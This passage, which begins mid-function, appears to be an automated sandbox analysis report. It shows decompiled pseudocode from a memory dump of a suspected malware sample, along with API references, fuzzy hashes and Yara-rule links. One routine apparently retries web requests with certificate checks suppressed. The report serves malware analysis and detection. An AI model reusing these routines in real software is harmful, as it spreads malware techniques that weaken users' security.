										_t42 =  *0x2bbd2e0; // 0x273a5a8
										_t19 = _t42 + 0x2bbe758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E02BB53BB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                                                                                                                                0x02bb7648
                                                                                                                                                                                                                                0x02bb7657
                                                                                                                                                                                                                                0x02bb765d
                                                                                                                                                                                                                                0x02bb778e
                                                                                                                                                                                                                                0x02bb778e
                                                                                                                                                                                                                                0x02bb7663
                                                                                                                                                                                                                                0x02bb7663
                                                                                                                                                                                                                                0x02bb7669
                                                                                                                                                                                                                                0x02bb766b
                                                                                                                                                                                                                                0x02bb767b
                                                                                                                                                                                                                                0x02bb767b
                                                                                                                                                                                                                                0x02bb766d
                                                                                                                                                                                                                                0x02bb766d
                                                                                                                                                                                                                                0x02bb7676
                                                                                                                                                                                                                                0x02bb7676
                                                                                                                                                                                                                                0x02bb766f
                                                                                                                                                                                                                                0x02bb766f
                                                                                                                                                                                                                                0x02bb7674
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7674
                                                                                                                                                                                                                                0x02bb766d
                                                                                                                                                                                                                                0x02bb7689
                                                                                                                                                                                                                                0x02bb7690
                                                                                                                                                                                                                                0x02bb7693
                                                                                                                                                                                                                                0x02bb769b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb76a1
                                                                                                                                                                                                                                0x02bb76a3
                                                                                                                                                                                                                                0x02bb76a8
                                                                                                                                                                                                                                0x02bb76ad
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb76b3
                                                                                                                                                                                                                                0x02bb76b3
                                                                                                                                                                                                                                0x02bb76bc
                                                                                                                                                                                                                                0x02bb76d3
                                                                                                                                                                                                                                0x02bb76df
                                                                                                                                                                                                                                0x02bb76e8
                                                                                                                                                                                                                                0x02bb76eb
                                                                                                                                                                                                                                0x02bb76f3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb76f9
                                                                                                                                                                                                                                0x02bb76fc
                                                                                                                                                                                                                                0x02bb7708
                                                                                                                                                                                                                                0x02bb770e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb7710
                                                                                                                                                                                                                                0x02bb7713
                                                                                                                                                                                                                                0x02bb771c
                                                                                                                                                                                                                                0x02bb771c
                                                                                                                                                                                                                                0x02bb7726
                                                                                                                                                                                                                                0x02bb772d
                                                                                                                                                                                                                                0x02bb7730
                                                                                                                                                                                                                                0x02bb7735
                                                                                                                                                                                                                                0x02bb773a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb773c
                                                                                                                                                                                                                                0x02bb773e
                                                                                                                                                                                                                                0x02bb774a
                                                                                                                                                                                                                                0x02bb774d
                                                                                                                                                                                                                                0x02bb7755
                                                                                                                                                                                                                                0x02bb7757
                                                                                                                                                                                                                                0x02bb7768
                                                                                                                                                                                                                                0x02bb7768
                                                                                                                                                                                                                                0x02bb776a
                                                                                                                                                                                                                                0x02bb776e
                                                                                                                                                                                                                                0x02bb776f
                                                                                                                                                                                                                                0x02bb7771
                                                                                                                                                                                                                                0x02bb7778
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb777a
                                                                                                                                                                                                                                0x02bb777a
                                                                                                                                                                                                                                0x02bb777e
                                                                                                                                                                                                                                0x02bb777f
                                                                                                                                                                                                                                0x02bb7781
                                                                                                                                                                                                                                0x02bb7788
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb778a
                                                                                                                                                                                                                                0x02bb778a
                                                                                                                                                                                                                                0x02bb778a
                                                                                                                                                                                                                                0x02bb7788
                                                                                                                                                                                                                                0x02bb7778
                                                                                                                                                                                                                                0x02bb773a
                                                                                                                                                                                                                                0x02bb770e
                                                                                                                                                                                                                                0x02bb76be
                                                                                                                                                                                                                                0x02bb76c9
                                                                                                                                                                                                                                0x02bb76cd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb76cd
                                                                                                                                                                                                                                0x02bb76bc
                                                                                                                                                                                                                                0x02bb76ad
                                                                                                                                                                                                                                0x02bb769b
                                                                                                                                                                                                                                0x02bb7797

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BB2E91,00000000,00000000,052F9618,?,?,02BB21A4,?,052F9618,0000EA60), ref: 02BB7663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BB2E91,00000000,00000000,052F9618,?,?,02BB21A4,?,052F9618,0000EA60), ref: 02BB778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3b3dc4374b61b6ff2d6fdaee6d022c4e00038081041df147cd734fcbda514b9f
                                                                                                                                                                                                                                • Instruction ID: 3b94b21d3c066469da50b5340124e36f7fe794047232ed1b5e91b8c026b92654
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b3dc4374b61b6ff2d6fdaee6d022c4e00038081041df147cd734fcbda514b9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B418372500209BFDB239FA5CC84EFABBB9EF44784F1045A9F64296450DBF1DA44DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB2AE3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB2AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02BB3037(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E02BB9DA2(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02BB9BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2bbd270, 0, _t25);
				}
				return _t22;
			}











                                                                                                                                                                                                                                0x02bb2ae3
                                                                                                                                                                                                                                0x02bb2af4
                                                                                                                                                                                                                                0x02bb2af8
                                                                                                                                                                                                                                0x02bb2b53
                                                                                                                                                                                                                                0x02bb2afa
                                                                                                                                                                                                                                0x02bb2b01
                                                                                                                                                                                                                                0x02bb2b09
                                                                                                                                                                                                                                0x02bb2b0c
                                                                                                                                                                                                                                0x02bb2b11
                                                                                                                                                                                                                                0x02bb2b15
                                                                                                                                                                                                                                0x02bb2b1b
                                                                                                                                                                                                                                0x02bb2b23
                                                                                                                                                                                                                                0x02bb2b26
                                                                                                                                                                                                                                0x02bb2b3e
                                                                                                                                                                                                                                0x02bb2b3e
                                                                                                                                                                                                                                0x02bb2b49
                                                                                                                                                                                                                                0x02bb2b49
                                                                                                                                                                                                                                0x02bb2b5a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,052F9364), ref: 02BB2B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,052F9364), ref: 02BB2B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                • Opcode ID: f7a8b5cbff751083edaa392c0cbd297e594124e887ef1ad3f8ecfe1b8d873cef
                                                                                                                                                                                                                                • Instruction ID: 64312716cf6a67c70f4ca98b04cb51eb420ef2fe1faa05023a92af5449a5c51c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7a8b5cbff751083edaa392c0cbd297e594124e887ef1ad3f8ecfe1b8d873cef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D301BC32610249BBDF226EA5DC44FEA7BB9EF84744F400466FB009B060DAB2D824CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5341, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E02BB5341(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02BB5157(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2bbc2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                                                                                                                                0x02bb5345
                                                                                                                                                                                                                                0x02bb5352
                                                                                                                                                                                                                                0x02bb5354
                                                                                                                                                                                                                                0x02bb5355
                                                                                                                                                                                                                                0x02bb535d
                                                                                                                                                                                                                                0x02bb535d
                                                                                                                                                                                                                                0x02bb5361
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5358
                                                                                                                                                                                                                                0x02bb5359
                                                                                                                                                                                                                                0x02bb535c
                                                                                                                                                                                                                                0x02bb535c
                                                                                                                                                                                                                                0x02bb5369
                                                                                                                                                                                                                                0x02bb536e
                                                                                                                                                                                                                                0x02bb5373
                                                                                                                                                                                                                                0x02bb537b
                                                                                                                                                                                                                                0x02bb5381
                                                                                                                                                                                                                                0x02bb5383
                                                                                                                                                                                                                                0x02bb5386
                                                                                                                                                                                                                                0x02bb538a
                                                                                                                                                                                                                                0x02bb538c
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb5390
                                                                                                                                                                                                                                0x02bb5392
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb539c
                                                                                                                                                                                                                                0x02bb539f
                                                                                                                                                                                                                                0x02bb53a2
                                                                                                                                                                                                                                0x02bb53a3
                                                                                                                                                                                                                                0x02bb53a5
                                                                                                                                                                                                                                0x02bb53ac
                                                                                                                                                                                                                                0x02bb53ac
                                                                                                                                                                                                                                0x02bb53b8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,052F95AC,02BB5884,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB535D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(?,02BBC2A4,00000002,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB5386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 3245e3e6cc31a91e6baef637decd9a9d8afdb5f0f51828592788d145206ce460
                                                                                                                                                                                                                                • Instruction ID: 15aa04c3bc27f6a616b163e399bab3671953a494c5fd32767892492baf51f986
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3245e3e6cc31a91e6baef637decd9a9d8afdb5f0f51828592788d145206ce460
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59019E717003466FE7224A2ADC45FFB6B9DEF85344F849091B946CB342D6F0C842C761
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB5B8B, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E02BB5B8B(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7021e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                                                                                                                                0x02bb5b92
                                                                                                                                                                                                                                0x02bb5b9f
                                                                                                                                                                                                                                0x02bb5ba1
                                                                                                                                                                                                                                0x02bb5ba4
                                                                                                                                                                                                                                0x02bb5be9
                                                                                                                                                                                                                                0x02bb5bf1
                                                                                                                                                                                                                                0x02bb5bf7
                                                                                                                                                                                                                                0x02bb5bfb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5ba8
                                                                                                                                                                                                                                0x02bb5bae
                                                                                                                                                                                                                                0x02bb5bb6
                                                                                                                                                                                                                                0x02bb5be7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5bb8
                                                                                                                                                                                                                                0x02bb5bb8
                                                                                                                                                                                                                                0x02bb5bc2
                                                                                                                                                                                                                                0x02bb5bc6
                                                                                                                                                                                                                                0x02bb5bcf
                                                                                                                                                                                                                                0x02bb5bd7
                                                                                                                                                                                                                                0x02bb5c05
                                                                                                                                                                                                                                0x02bb5bd9
                                                                                                                                                                                                                                0x02bb5bd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb5bd9
                                                                                                                                                                                                                                0x02bb5bd7
                                                                                                                                                                                                                                0x02bb5bc2
                                                                                                                                                                                                                                0x02bb5c08
                                                                                                                                                                                                                                0x02bb5c0f
                                                                                                                                                                                                                                0x02bb5c0f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,02BBA77A,00000000,?,?), ref: 02BB5BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 543305b0812f37d83e6dfa7e286e7e783767f12eec00b0412e0b0757135fb234
                                                                                                                                                                                                                                • Instruction ID: fcc39aae8ebab8317493f2e08699bfc880457cb0238fb2af74eaeac6099fe9d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 543305b0812f37d83e6dfa7e286e7e783767f12eec00b0412e0b0757135fb234
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C012D75944208FFDB329F95D888AEEBFB8EF84755F5484A6E501E3140C7B08644DB62
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB53BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB53BB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2bbd270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x02bb53c7
                                                                                                                                                                                                                                0x02bb53cd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 5abaec03e50359c11367aee0d13d9c1d648dc15d354bccb3761b8d97345a219e
                                                                                                                                                                                                                                • Instruction ID: 48433187e9e1dc480471d6ad4dd17d3c3e606d6f36275595737f9d54d5eae613
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5abaec03e50359c11367aee0d13d9c1d648dc15d354bccb3761b8d97345a219e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACB012B1D80100AFCE238B50DF04F05BE31B750780F005822B34401070C2B14830FF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6B85, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E02BB6B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02BB4A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2bbd2e0; // 0x273a5a8
						_t20 = _t68 + 0x2bbe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02BB5626(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                0x02bb6b8b
                                                                                                                                                                                                                                0x02bb6b8e
                                                                                                                                                                                                                                0x02bb6b9e
                                                                                                                                                                                                                                0x02bb6ba7
                                                                                                                                                                                                                                0x02bb6bab
                                                                                                                                                                                                                                0x02bb6c79
                                                                                                                                                                                                                                0x02bb6c7f
                                                                                                                                                                                                                                0x02bb6c7f
                                                                                                                                                                                                                                0x02bb6bc5
                                                                                                                                                                                                                                0x02bb6bca
                                                                                                                                                                                                                                0x02bb6bce
                                                                                                                                                                                                                                0x02bb6bd4
                                                                                                                                                                                                                                0x02bb6bd9
                                                                                                                                                                                                                                0x02bb6be0
                                                                                                                                                                                                                                0x02bb6bef
                                                                                                                                                                                                                                0x02bb6bef
                                                                                                                                                                                                                                0x02bb6bf3
                                                                                                                                                                                                                                0x02bb6bf5
                                                                                                                                                                                                                                0x02bb6c01
                                                                                                                                                                                                                                0x02bb6c0c
                                                                                                                                                                                                                                0x02bb6c17
                                                                                                                                                                                                                                0x02bb6c1b
                                                                                                                                                                                                                                0x02bb6c25
                                                                                                                                                                                                                                0x02bb6c29
                                                                                                                                                                                                                                0x02bb6c2b
                                                                                                                                                                                                                                0x02bb6c30
                                                                                                                                                                                                                                0x02bb6c37
                                                                                                                                                                                                                                0x02bb6c47
                                                                                                                                                                                                                                0x02bb6c47
                                                                                                                                                                                                                                0x02bb6c30
                                                                                                                                                                                                                                0x02bb6c29
                                                                                                                                                                                                                                0x02bb6c49
                                                                                                                                                                                                                                0x02bb6c4e
                                                                                                                                                                                                                                0x02bb6c53
                                                                                                                                                                                                                                0x02bb6c53
                                                                                                                                                                                                                                0x02bb6c56
                                                                                                                                                                                                                                0x02bb6c5f
                                                                                                                                                                                                                                0x02bb6c64
                                                                                                                                                                                                                                0x02bb6c64
                                                                                                                                                                                                                                0x02bb6c69
                                                                                                                                                                                                                                0x02bb6c6e
                                                                                                                                                                                                                                0x02bb6c6e
                                                                                                                                                                                                                                0x02bb6c69
                                                                                                                                                                                                                                0x02bb6bf3
                                                                                                                                                                                                                                0x02bb6c70
                                                                                                                                                                                                                                0x02bb6c76
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB4A6A: SysAllocString.OLEAUT32(80000002), ref: 02BB4AC7
                                                                                                                                                                                                                                  • Part of subcall function 02BB4A6A: SysFreeString.OLEAUT32(00000000), ref: 02BB4B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(02BB48F5), ref: 02BB6C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 393a9f478412837e96b0475ab1747f243c472596803d33568163cc97fed717c5
                                                                                                                                                                                                                                • Instruction ID: 657c5505e02338560062d7fd0c162eee51843f0e3560accc5217d09ef656197a
